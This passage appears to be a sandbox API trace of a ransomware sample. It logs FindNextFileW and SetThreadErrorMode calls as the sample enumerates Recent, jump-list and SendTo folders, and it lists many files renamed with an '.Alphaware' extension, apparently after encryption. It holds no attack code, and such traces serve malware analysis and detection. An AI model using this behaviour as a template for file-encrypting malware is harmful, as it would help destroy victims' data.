cFileName="xfj_k_QyvZX0.lnk.Alphaware", cAlternateFileName="XFJ_K_~1.ALP")) returned 1 [0099.805] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd11bb920, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd11bb920, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d73fac0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="xZfG0gp1VfGWa8doIagS.ots.lnk.Alphaware", cAlternateFileName="XZFG0G~1.ALP")) returned 1 [0099.805] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0bc8220, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1312580, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d78bd80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xcc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="y- 0.lnk.Alphaware", cAlternateFileName="Y-0LNK~1.ALP")) returned 1 [0099.805] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0301100, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0301100, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d7d8040, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x534, dwReserved0=0x0, dwReserved1=0x0, cFileName="yjr9.lnk.Alphaware", cAlternateFileName="YJR9LN~1.ALP")) returned 1 [0099.805] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce7a1400, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd148f340, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d824300, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1288, dwReserved0=0x0, dwReserved1=0x0, cFileName="yQlR.lnk.Alphaware", cAlternateFileName="YQLRLN~1.ALP")) returned 1 [0099.805] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd06df4c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd06df4c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d8705c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2160, dwReserved0=0x0, dwReserved1=0x0, cFileName="YYaadTzVoXXESXd.lnk.Alphaware", cAlternateFileName="YYAADT~1.ALP")) returned 1 [0099.805] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15bfe40, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15bfe40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d896720, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x488, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z3ZXfX.lnk.Alphaware", cAlternateFileName="Z3ZXFX~1.ALP")) returned 1 [0099.805] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1018a00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1018a00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d8e29e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1308, dwReserved0=0x0, dwReserved1=0x0, cFileName="z8zS.lnk.Alphaware", cAlternateFileName="Z8ZSLN~1.ALP")) returned 1 [0099.805] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd11957c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd11957c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d92eca0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe34, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZiOJla1 Q-SXSl2W5.lnk.Alphaware", cAlternateFileName="ZIOJLA~1.ALP")) returned 1 [0099.806] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13f6dc0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13f6dc0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d97af60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1548, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZKwJY960tnphZx9R1d2d.lnk.Alphaware", cAlternateFileName="ZKWJY9~1.ALP")) returned 1 [0099.806] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd047dec0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd047dec0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d9c7220, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xde0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zOe1LTkImCuAAhrwbXf9.swf.lnk.Alphaware", cAlternateFileName="ZOE1LT~1.ALP")) returned 1 [0099.806] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd08a8540, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd08a8540, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8da134e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2274, dwReserved0=0x0, dwReserved1=0x0, cFileName="zR 1JJINH15QPReboG.lnk.Alphaware", cAlternateFileName="ZR1JJI~1.ALP")) returned 1 [0099.806] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd040baa0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16ca7e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8da5f7a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xcf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="zu2JIWj2WW.lnk.Alphaware", cAlternateFileName="ZU2JIW~1.ALP")) returned 1 [0099.806] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcef5db80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcef5db80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8da85900, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="_7pBY2-omnUcu.lnk.Alphaware", cAlternateFileName="_7PBY2~1.ALP")) returned 1 [0099.806] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd11957c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd11957c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8dad1bc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aOXubo 1XFZS.lnk.Alphaware", cAlternateFileName="_AOXUB~1.ALP")) returned 1 [0099.806] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd11957c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd11957c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8dad1bc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aOXubo 1XFZS.lnk.Alphaware", cAlternateFileName="_AOXUB~1.ALP")) returned 0 [0099.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0099.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0099.806] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0099.806] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x478c2f30, ftLastAccessTime.dwHighDateTime=0x1d706ac, ftLastWriteTime.dwLowDateTime=0x478c2f30, ftLastWriteTime.dwHighDateTime=0x1d706ac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.807] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xd0abd0b0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x16740, dwReserved0=0x0, dwReserved1=0x0, cFileName="1b4dd67f29cb1962.automaticDestinations-ms", cAlternateFileName="1B4DD6~1.AUT")) returned 1 [0099.807] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47876c70, ftCreationTime.dwHighDateTime=0x1d706ac, ftLastAccessTime.dwLowDateTime=0x47876c70, ftLastAccessTime.dwHighDateTime=0x1d706ac, ftLastWriteTime.dwLowDateTime=0x22731320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="7e4dca80246863e3.automaticDestinations-ms", cAlternateFileName="7E4DCA~1.AUT")) returned 1 [0099.807] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0099.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0099.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0099.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0099.807] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x478c2f30, ftLastAccessTime.dwHighDateTime=0x1d706ac, ftLastWriteTime.dwLowDateTime=0x478c2f30, ftLastWriteTime.dwHighDateTime=0x1d706ac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.807] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xd0abd0b0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x16740, dwReserved0=0x0, dwReserved1=0x0, cFileName="1b4dd67f29cb1962.automaticDestinations-ms", cAlternateFileName="1B4DD6~1.AUT")) returned 1 [0099.808] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47876c70, ftCreationTime.dwHighDateTime=0x1d706ac, ftLastAccessTime.dwLowDateTime=0x47876c70, ftLastAccessTime.dwHighDateTime=0x1d706ac, ftLastWriteTime.dwLowDateTime=0x22731320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="7e4dca80246863e3.automaticDestinations-ms", cAlternateFileName="7E4DCA~1.AUT")) returned 1 [0099.808] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47876c70, ftCreationTime.dwHighDateTime=0x1d706ac, ftLastAccessTime.dwLowDateTime=0x47876c70, ftLastAccessTime.dwHighDateTime=0x1d706ac, ftLastWriteTime.dwLowDateTime=0x22731320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="7e4dca80246863e3.automaticDestinations-ms", cAlternateFileName="7E4DCA~1.AUT")) returned 0 [0099.808] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0099.808] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0099.808] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0099.809] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x56702640, ftLastAccessTime.dwHighDateTime=0x1d9728a, ftLastWriteTime.dwLowDateTime=0x56702640, ftLastWriteTime.dwHighDateTime=0x1d9728a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.809] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f1ee270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7f1ee270, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="1b4dd67f29cb1962.customDestinations-ms", cAlternateFileName="1B4DD6~1.CUS")) returned 1 [0099.809] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3002940, ftCreationTime.dwHighDateTime=0x1d706b2, ftLastAccessTime.dwLowDateTime=0x56702640, ftLastAccessTime.dwHighDateTime=0x1d9728a, ftLastWriteTime.dwLowDateTime=0x56702640, ftLastWriteTime.dwHighDateTime=0x1d9728a, nFileSizeHigh=0x0, nFileSizeLow=0x14a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="590aee7bdd69b59b.customDestinations-ms", cAlternateFileName="590AEE~1.CUS")) returned 1 [0099.809] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7ef9a730, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ef9a730, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x43a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="5afe4de1b92fc382.customDestinations-ms", cAlternateFileName="5AFE4D~1.CUS")) returned 1 [0099.809] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f1ee270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7f1ee270, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="7e4dca80246863e3.customDestinations-ms", cAlternateFileName="7E4DCA~1.CUS")) returned 1 [0099.809] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc738d980, ftCreationTime.dwHighDateTime=0x1d706b2, ftLastAccessTime.dwLowDateTime=0x88c02790, ftLastAccessTime.dwHighDateTime=0x1d70913, ftLastWriteTime.dwLowDateTime=0x88c02790, ftLastWriteTime.dwHighDateTime=0x1d70913, nFileSizeHigh=0x0, nFileSizeLow=0x1f68, dwReserved0=0x0, dwReserved1=0x0, cFileName="d93f411851d7c929.customDestinations-ms", cAlternateFileName="D93F41~1.CUS")) returned 1 [0099.809] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0099.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0099.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0099.812] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0099.813] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x56702640, ftLastAccessTime.dwHighDateTime=0x1d9728a, ftLastWriteTime.dwLowDateTime=0x56702640, ftLastWriteTime.dwHighDateTime=0x1d9728a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.813] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f1ee270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7f1ee270, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="1b4dd67f29cb1962.customDestinations-ms", cAlternateFileName="1B4DD6~1.CUS")) returned 1 [0099.813] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3002940, ftCreationTime.dwHighDateTime=0x1d706b2, ftLastAccessTime.dwLowDateTime=0x56702640, ftLastAccessTime.dwHighDateTime=0x1d9728a, ftLastWriteTime.dwLowDateTime=0x56702640, ftLastWriteTime.dwHighDateTime=0x1d9728a, nFileSizeHigh=0x0, nFileSizeLow=0x14a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="590aee7bdd69b59b.customDestinations-ms", cAlternateFileName="590AEE~1.CUS")) returned 1 [0099.813] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7ef9a730, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ef9a730, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x43a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="5afe4de1b92fc382.customDestinations-ms", cAlternateFileName="5AFE4D~1.CUS")) returned 1 [0099.814] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f1ee270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7f1ee270, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="7e4dca80246863e3.customDestinations-ms", cAlternateFileName="7E4DCA~1.CUS")) returned 1 [0099.814] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc738d980, ftCreationTime.dwHighDateTime=0x1d706b2, ftLastAccessTime.dwLowDateTime=0x88c02790, ftLastAccessTime.dwHighDateTime=0x1d70913, ftLastWriteTime.dwLowDateTime=0x88c02790, ftLastWriteTime.dwHighDateTime=0x1d70913, nFileSizeHigh=0x0, nFileSizeLow=0x1f68, dwReserved0=0x0, dwReserved1=0x0, cFileName="d93f411851d7c929.customDestinations-ms", cAlternateFileName="D93F41~1.CUS")) returned 1 [0099.814] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc738d980, ftCreationTime.dwHighDateTime=0x1d706b2, ftLastAccessTime.dwLowDateTime=0x88c02790, ftLastAccessTime.dwHighDateTime=0x1d70913, ftLastWriteTime.dwLowDateTime=0x88c02790, ftLastWriteTime.dwHighDateTime=0x1d70913, nFileSizeHigh=0x0, nFileSizeLow=0x1f68, dwReserved0=0x0, dwReserved1=0x0, cFileName="d93f411851d7c929.customDestinations-ms", cAlternateFileName="D93F41~1.CUS")) returned 0 [0099.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0099.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0099.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0099.817] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf9b7c855, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.817] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x639ff80f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Compressed (zipped) Folder.ZFSendToTarget", cAlternateFileName="COMPRE~1.ZFS")) returned 1 [0099.817] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x3bb52ab9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop (create shortcut).DeskLink", cAlternateFileName="DESKTO~1.DES")) returned 1 [0099.817] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x3d828fa3, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x22e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0099.817] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf9b7c855, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents.mydocs", cAlternateFileName="DOCUME~1.MYD")) returned 1 [0099.817] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x3d802e42, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fax Recipient.lnk", cAlternateFileName="FAXREC~1.LNK")) returned 1 [0099.818] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799b81f0, 